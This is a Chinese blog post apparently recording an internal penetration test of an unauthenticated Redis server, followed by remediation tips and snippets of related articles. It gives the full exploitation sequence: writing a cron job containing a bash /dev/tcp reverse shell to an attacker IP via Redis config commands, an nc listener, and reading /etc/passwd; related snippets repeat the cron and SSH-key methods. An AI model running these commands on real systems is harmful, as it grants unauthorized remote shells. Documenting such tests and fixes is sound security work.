Redis未授权访问导致getshell

最新推荐文章于 2024-07-07 17:51:51 发布
最新推荐文章于 2024-07-07 17:51:51 发布
阅读量3.3k 收藏 1
点赞数
分类专栏: 渗透测试 漏洞复现 文章标签: redis 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/isxiaole/article/details/121226566
版权

redis未授权访问导致getshell-记录

1. 背景

公司内网危险端口扫描时,发现大量6379开放。redis服务默认端口6379(脑子里要有这个条件反射)。于是有了此文章利用记录。

2. 发现与利用

利用对象:192.168.6.38
漏洞利用:redis未授权访问漏洞
流程:
A、telnet 192.168.6.38 6379 尝试端口通不通
B、使用redis-cli工具连接测试存在未授权访问漏洞
连接reids
C、利用redis中set命令写入一下命令:
1、set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.57.201.77/4444 0>&1\n\n"
2、config set dir /var/spool/cron
3、config set dbfilename root
4、save
如下图:
redis命令写入
D、使用kali linux(10.57.201.77)接受shell
nc -lvnp 4444
如下图
在这里插入图片描述
E、查找主机负责人
cat /etc/passwd
查看公司那些人登陆过此主机,联系责任人整改;

查看passwd

3. 处置建议:

	a、为 Redis 添加密码验证(重启redis才能生效)
    修改 redis.conf 文件,添加 requirepass mypassword
  (注意redis不要用-a参数,明文输入密码,连接后使用auth认证)
	b、限制可连接Redis服务器的IP
. after
关注
专栏目录
Redis 授权访问引发的安全问题
weixin_45253622的博客
12-23 3633
Redis Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 默认端口:6379 安全问题 Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写
redis授权访问getshell的方式
居上
06-28 2046
redis简介 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库 端口:6379 环境 kali =>192.168.60.134 cenos => 192.168.60.130 redis授权访问 Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,如配置防火墙规则避免其他非信任来源的IP访问,就会将Redis服务暴露在公网上 ./redis-server 使用默认配置 ./red
redis授权到getshell
weixin_68408599的博客
06-12 1061
写入webshell虽然简单便捷,但是很多网站都严格限制了写入规则,但是可以通过定时任务,写入公钥等来获取webshell并建立持久性控制。自己使用需要小心,redis授权是比较常见的漏洞了,常常被用于执行挖矿病毒,甚至是勒索病毒。
ssrf结合redis授权getshell
最新发布
求大佬师傅带
07-07 970
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis授权,即可getshell
redis 授权访问及getshell
Guoke324的博客
04-06 784
目录 redis授权访问 redis getshell方法 写 webshell 文件 利用 写SSH key进行 getshell 通过写corntab的方式进行getshell redis授权访问 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。 利用python去检测,或者...
Redis授权访问getshell》复现笔记(一)
limb0的博客
09-12 733
Redis授权访问getshell》复现笔记(一) 利用周末复现了一下Redis授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。 一、 环境介绍 靶机:CentOS 6.5 (点击下载) IP:192.168.17.140 攻击机:Win10(本机) IP:192.168.8.195 二、...
redis授权getshell四种方式
没有
04-24 4665
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
Redis授权访问漏洞
周星星的博客
08-22 1536
Redis授权访问漏洞复现以及利用
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全...
redis_授权访问
scu_hacker博客
01-13 8228
本文介绍redis授权访问的4种利用方式
Redis授权访问getshell》复现笔记(二)
limb0的博客
09-16 508
Redis授权访问getshell》复现笔记(二) 复现完了写马getshell,我们再来复现一下利用crontab反弹shell: 使用nc.exe在攻击机上监听9999端口: nc –lvvp 9999 还是使用Redis Clinet写入如下命令 config set dir /var/spool/cron config set dbfilename root set xxx "\n...
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
Redis 授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 4094
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的授权范围与Pickle反序列化
Redis授权getshell及修复方案
打工人日记
12-31 658
应用介绍 简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。 漏洞介绍 默认配置下redis并没有设置密码,被攻击者恶意利用可以导致授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等 安装redis docker run -itd --name redis-test -p 6379:6379 redis 常用命令 ping:检测是否连通且有权限执行命令 info:读取Redis敏感数据 keys:
redis 授权访问shell
blackguest07的博客
03-18 1006
redis授权访问shell
Redis 授权访问与Get Shell漏洞
K1ose的博客
11-20 1043
Redis 授权访问与Get Shell漏洞 漏洞原理与危害 Redis默认情况下,会绑定在默认端口,如果没有采用相关策略,例如 ​ ①防火墙拦截非信任IP ​ ②端口屏蔽 会将Redis服务器暴露在公网上,如果没有设置口令认证,会导致任意用户在访问目标服务器时能够授权便访问Redis以及其数据。利用Redis自身提供的config命令进行写文件操作,可以将自己的SSH公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登陆目标
记录一次Redis授权getshell几种常见方法
qq_45888826的博客
09-17 3877
记录一次Redis授权getshell几种常见方法
redis 授权/知道密码 下getshell
问题很多的小明
06-20 499
常用的方法,计划任务,写webshell,主从复制,写公钥文件(会覆盖) 1 写公钥文件 ssh-keygen –t rsa (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt cat test.txt |redis-cli -h 192.168.0.109 -a 123456 -x set crackit redis-cli -h 192.168.0.109 -a 123456 config set dir /root/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值